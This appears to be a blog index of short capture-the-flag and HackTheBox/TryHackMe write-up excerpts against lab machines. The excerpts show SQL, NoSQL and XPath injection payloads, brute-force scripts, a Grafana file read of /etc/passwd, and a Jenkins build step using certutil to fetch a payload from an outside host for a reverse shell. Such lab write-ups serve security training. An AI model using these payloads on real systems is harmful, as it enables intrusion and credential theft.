e

emacab98

Penetration tester, cyber security student, CTF enthusiast. The writeups on this page aren't the most beautiful ones nor the most explicative, but they are supposedly short and to the point. If you need a nudge in the right direction or you want a second look on a machine you completed, these are quick reads for your fast-paced, (hopefully) ethical, hacker life. Merry Hacking!

Carpediem - HTB - Key Points

Target's IP: 10.10.11.167PORT   STATE SERVICE22/tcp open  ssh80/tcp open  httpHostname revealed: carpediem.htbThrough subdomain enumeration, we can find a new domain name as well: portal.carpediem.htbThere is a request subject to SQL injection:GET /?p=bikes&c=c4ca4238a0b923820dcc509a6f75849b'%2b(selectfrom(select(sleep(20)))a)%2b'Automating with SQLmap, we can dump the entire database, including the admin's hash:1,uploads/1635793020HONDAXADV.png,Male,<blank>,jhammond@carpediem.htb,Hamm...
Read post

Health - HTB - Key Points

Target's IP: 10.10.11.176Hostname: health.htbThe functionality of the website calls for SSRF, and it is, indeed, the case. We can bypass the filter on the website using an open redirect, as shown on Hacktricks.Redirecting to the filtered port on 3000, we get the source code of a Gogs page. Checking for Gogs on the internet, there is a known SQLinjection vulnerability we can exploit:python2 redirect.py --port 80 --ip 10.10.14.40 "http://10.10.11.176:3000/api/v1/users/search?q=e')/**/union/**/all/...
Read post

MetaTwo - HTB - Key Points

Target's IP: 10.10.11.186PORT   STATE SERVICE21/tcp open  ftp22/tcp open  ssh80/tcp open  httpUnknown host: metapress.htbProudly powered by WordPress. Let's enumerate using wpscan.[i] Plugin(s) Identified:                                                                                                                                                                                                                                                                                                 [+] bo...
Read post

BabyEncryption - HTB - Challenges

import string#from secret import MSG#ct = encryption(MSG)f = open('./msg.enc','r')text = bytes.fromhex(f.readline())result = ""alphabet = string.printablefor char in text:    for letter in alphabet:        if((123 * ord(letter) + 18 ) % 256 == char):            result += letterprint(result) ...
Read post

Toxic - HTB - Challenges

Challenge's address: 139.59.189.189:32670Checking out the source code attached to the challenge, it's easy to spot the call to unserialize. Following this blog post, https://snoopysecurity.github.io/web-application-security/2021/01/08/02_php_object_injection_exploitation-notes.html, we note that the only model defined in the challenge also calls the destruct magic method, which will help us in our exploitation.The method includes files, so it will allow us to read, we have a LFI on our hands. Fi...
Read post

Ambassador - HTB - Key Points

Target's IP: 10.10.11.183PORT     STATE SERVICE22/tcp   open  ssh80/tcp   open  http3000/tcp open  ppp3306/tcp open  mysqlGrafana on 3000 subject to unauthorized arbitrary file read, as per https://www.exploit-db.com/exploits/50581 Reading passwd, consul and grafana and developer are users on the boxGoogling for common configuration files, we can read /etc/grafana/grafana.ini# Either "mysql", "postgres" or "sqlite3", it's your choice;type = sqlite3;host = 127.0.0.1:3306;name = grafana;user = roo...
Read post

Phonebook - HTB - Challenges

To exploit the wildcard SQL injection, this script helps us to identify the username:import requestsimport stringalphabet = string.digits + string.asciilowercase + string.asciiuppercase + string.punctuationword = ''while(True):    for letter in alphabet:        x = requests.post('http://165.22.122.58:31348/login', data = {'username': word + letter + '', 'password': ''})        if x.url == 'http://165.22.122.58:31348/':            word = word + letter            print(word)With a slight modificat...
Read post

Shared - HTB - Key Points

Target's IP: 10.10.11.172PORT    STATE SERVICE22/tcp  open  ssh80/tcp  open  http443/tcp open  httpsRoot page / redirects to: http://shared.htbSubdomain enumeration returns checkout as a valid subdomain, so we also add checkout.shared.htb to the hosts file.Ecommerce software by Prestashop seems subject to an exploit, more specifically https://www.exploit-db.com/exploits/45964, but I was not able to make it work.customcart cookie is injectable, the answer when requesting the page on the checkout ...
Read post

UpDown - HTB - Key Points

Target's IP: 10.10.11.177PORT   STATE SERVICE22/tcp open  ssh80/tcp open  httpConnecting to the website leaks a domain name, siteisup.htbRecursive brute forcing of directories reveals the following two ones:/dev/dev.gitDownloading the .git is easy thanks to directory indexing, just run wget -r http://siteisup.htb/dev/.gitAnalyzing the git repo, there is an interesting commit we must checkout:commit 8812785e31c879261050e72e20f298ae8c43b565Author: Abdou.Y <84577967+ab2pentest@users.noreply.gith...
Read post

Faculty - HTB - Key Points

Target's IP: 10.10.11.169PORT   STATE SERVICE22/tcp open  ssh80/tcp open  httphttp-title: Did not follow redirect to http://faculty.htbJavascript on login page suggests that if you intercept response and change 3 to 1 you can bypass logincblake@faculty.htbejames@faculty.htbjsmith@faculty.htbsqlmap -u 'http://faculty.htb/view_schedule.php?id=1' -T users --dumpAdministrator | 1    | 1fecbe762af147c1176a0fc2c722a345 | adminGenerating PDFs as an authenticated user, you can see that the tool used to ...
Read post

Shoppy - HTB - Key Points

Target's IP: 10.10.11.180PORT     STATE SERVICE22/tcp   open  ssh80/tcp   open  http9093/tcp open  copycatThe login suffers from NoSQL injection, we can bypass the login stage withusername=admin'||'1==1//&password=aaasa Again, injecting the  user search and downloading the export:username "admin"password "23c6877d9e2b564ef8b32c3a23de27b2" username "josh"password "6ebcea65320589ca4f2f1ce039975995"These look like md5 hashes, trying hashcat to crack them:6ebcea65320589ca4f2f1ce039...
Read post

Photobomb - HTB - Key Points

Target's IP: 10.10.11.182PORT   STATE SERVICE22/tcp open  ssh80/tcp open  httpTrying to connect to the web server reveals an important information:Unknown host: photobomb.htbConnecting to the web server returns 401 - Unauthorized to all requests, but from the developer tools we see that the page includes a Javascript file that contains sensitive information:function init() {  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me  if (document.cookie.match(/...
Read post

Support - HTB - Key Points

Target IP: 10.10.11.174 nmap -sS -p- -T4 --min-rate=10000 10.10.11.174 Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-12 09:18 CEST Nmap scan report for 10.10.11.174 Host is up (0.11s latency). Not shown: 65516 filtered tcp ports (no-response) PORT      STATE SERVICE 53/tcp    open  domain 88/tcp    open  kerberos-sec 135/tcp   open  msrpc 139/tcp   open  netbios-ssn 389/tcp   open  ldap 445/tcp   open  microsoft-ds 464/tcp   open  kpasswd5 593/tcp   open  http-rpc-epmap 636/tcp   open  ldap...
Read post

Trick - HTB - Key Points

Target's IP: 10.10.11.166nmap -sS -p- -T4 --min-rate=10000 10.10.11.166PORT   STATE SERVICE22/tcp open  ssh25/tcp open  smtp53/tcp open  domain80/tcp open  http└─# nslookup> server 10.10.11.166Default server: 10.10.11.166Address: 10.10.11.166#53> 10.10.11.166166.11.10.10.in-addr.arpa       name = trick.htb.We add this domain name to our /etc/hosts file. Now we can enumerate further for subdomains.Asking for a zone transfer withdig axfr trick.htb @trick.htb reveals a new subdomain, preprod-...
Read post

Vulnnet Endgame - THM - Key Points

Initial scan reveals 22 and 80. We also have a domain name from the introduction of the box, so we can enumerate for subdomainsRun gobuster vhost -u http://vulnnet.thm -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txtI found 4 more valid domains, blog, api, shop and admin1Brute forcing for directories in the admin1 domain reveals some interesting ones, like vendor, fileadmin, typo3temp, typo3Typo3 seems to be an open source CMS, we lack credentials to login thoughAnalyzing th...
Read post

RingZer0CTF - Hash me if you can

We need to create a small script in order to be quick enough to solve this challenge, as we cannot possibly copy the message, hash it and send the correct request in under two seconds.The script to solve this challenge is fairly straightforward, here it is:import requestsimport hashlibx = requests.get('http://challenges.ringzer0team.com:10013/')if '----- BEGIN MESSAGE -----' in x.text:    start = x.text.index('----- BEGIN MESSAGE -----') + len('----- BEGIN MESSAGE -----') + 15 #15 is required to...
Read post

Nunchuks - HTB - Key Points

Open ports: 22, 80 and 443 after a super quick scanCertificate from 443 reveals a domain, nunchucks.htbSubdomain enumeration reveals another possible target, store.nunchucks.htbThe store has a newsletter subscription function that reflects the email address provided. Using Wappalyzer, we can see the website is running on NodeJS, so let's look for SSTI on NodeJSHacktricks suggests the following payload to try out: {{7*7}}. This should return 49. It is the payload listed under the template engine ...
Read post

Shocker - HTB - Key Points

Open port on 80 and a 2222 which is actually an SSH over deeper inspection (detect the specific port using sV in nmap)Enumeration of the web server won't reveal much besides a cgi-bin directory, fuzzing for scripts returns a user.sh scriptWe can try and exploit this with Shellshock, using the metasploit module exploit/multi/http/apache_mod_cgi_bash_env_exec. This gives us low privileged access on the boxRunning "id" we see our user is part of the lxd group, meaning we can immediately escalate to...
Read post

basic-mod-2 - picoCTF 2022

import stringalphabet = string.asciiuppercase + string.digits + ""code = "104 85 69 354 344 50 149 65 187 420 77 127 385 318 133 72 206 236 206 83 342 206 370"words = code.split(" ")result = ""for word in words:    module = int(word) % 41    for i in range (41):        if((module * i ) % 41 == 1 ):            result += alphabet[i-1]            breakprint(result) ...
Read post

basic-mod-1 - picoCTF 2022

import stringalphabet = string.ascii_uppercase + string.digits + "_"code = "202 137 390 235 114 369 198 110 350 396 390 383 225 258 38 291 75 324 401 142 288 397"words = code.split(" ")result = ""for word in words:    result += alphabet[int(word) % 37]print(result) ...
Read post

substitution0, 1 and 2 - picoCTF 2022

Uncomment cipher, plain and crypt to solve either the first, second or third substitution challenge.Always start with the assumption that the last few words are "the flag is picoCTF{<something>}" and you already have the substitution for some of the letters. With these, you can try to understand what is missing looking at the English text and add letters to the substitution until you get a fully formed text (and the flag).#cipher = '''QWITJSYHXCNDFERMUKGOPVALBZ #Hjkjpmre Djykqet qkrgj, axo...
Read post

transposition-trial - PicoCTF 2022

cipher = "heTfl g as iicpCTo{7F4NRP051N51635P3X51N3_V091B0AE}2"result = ""for i in range(2, len(cipher), 3):    result += cipher[i] + cipher[i-2] + cipher [i-1]    print(result)     ...
Read post

Most Cookies - PicoCTF

Followed explanation at this linkJust remember to put your cookie inside the cookie variable and update the wordlist with the possible secrets used to sign the cookie.import flaskimport hashlibfrom sys import argvfrom flask.json.tag import TaggedJSONSerializerfrom itsdangerous import URLSafeTimedSerializer, TimestampSigner, BadSignaturecookie = 'eyJ2ZXJ5X2F1dGgiOiJibGFuayJ9.Yh4n3A.tAnfOTWKodF6TbdczS-Pt-JPzdM'wordlist = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbre...
Read post

caas - PicoCTF

Look at the JS provided, while at a first look you might think there might be some SSTI involved, once you look at the code it's clear: Node runs a system command inserting user input. We only need to stop the current program's execution and start something more useful. A combination of a semicolon and anything else you might want to use is fine. For example, I used ls to see file names in the current directory and then printed the one that interested me, like this:https://caas.mars.picoctf.net/...
Read post

X marks the spot - pico

import requestsimport stringchars = string.ascii_lowercase + string.ascii_uppercase + string.digits + "}_"flag = "picoCTF{"while True:    for char in chars:        result = requests.post("http://mercury.picoctf.net:20297/", data = {"name": "' or //*[starts-with(text(), '"+flag+char+"')] or 'a'='b", "pass":"pass"})        if "right path" in result.text:            flag += char            print("Added char: " + flag)            break ...
Read post

Zeno - THM

At first, after a basic scan, there is only a 12340 TCP port open and SSH on 22. Connecting to it using netcat reveals this is an Apache 2.4.6 webserver, running on PHP 5.4.16.Using a directory scanner, we find out there is RMS installed on the webserver.In our manual scraping of the website, we can notice that, once we create an account, we get a sample message from an account called "administrator", and in the Contact Us section there is an email address that is registered to the domain pathfi...
Read post

Skynet - THM - Braindump

There is a web server and samba running, automatically scan both using dirb and enum4linux.The web page served is a useless search, nothing in the source code either.There is anonymous listing enabled on the samba server, there are some directories to examine.Dirb returned a login form exposed on a /squirrelmail directory, there is also a version number: 1.4.23There is a known RCE for this version, but requires login credentials. Maybe we have a username (milesdyson) but password?In the meanwhil...
Read post

Alfred - THM - Braindump

There are two web servers, one on 80 revealing an email address, and one on 8080 that is a Jenkins login page. Jenkins has, notoriously, a poor password policy.Searching on Google, default is admin. Tried simple combinations, admin:admin worked.We can modify the configuration for the existing project and insert a build command to run when building it, we can try to launch a reverse shell from it.We can use this command in the build:certutil.exe -urlcache -split -f http://10.9.4.63:8000/Advanced....
Read post

Steel Mountain - THM - Braindump

After an initial scan, there are ports that suggest this is a Windows box. There is also a web server on 80, shows an image and nothing more. Nothing found using dirbuster.There is also another web server, on 8080. Reading the source of the page, this shows a name and a version, Rejetto HFS 2.3. There are some known RCE exploits for this specific version, one in metasploit called exploit/windows/http/rejettohfsexec, let's try this one. Seems to work, meterpreter shell opened. We are user bill in...
Read post

Road - THM

Road - THMThere is an SSH port open and a web server. With no credentials, the web server is a better option right now.I started by looking around the website: there is the information about who created the platform right in front of you, but I could not turn that into valuable info with a basic search. I registered an account and logged in. Snoop around the authenticated pages, and you see there is a functionality to upload a profile picture, but it is admin-only. However, this tells us the ema...
Read post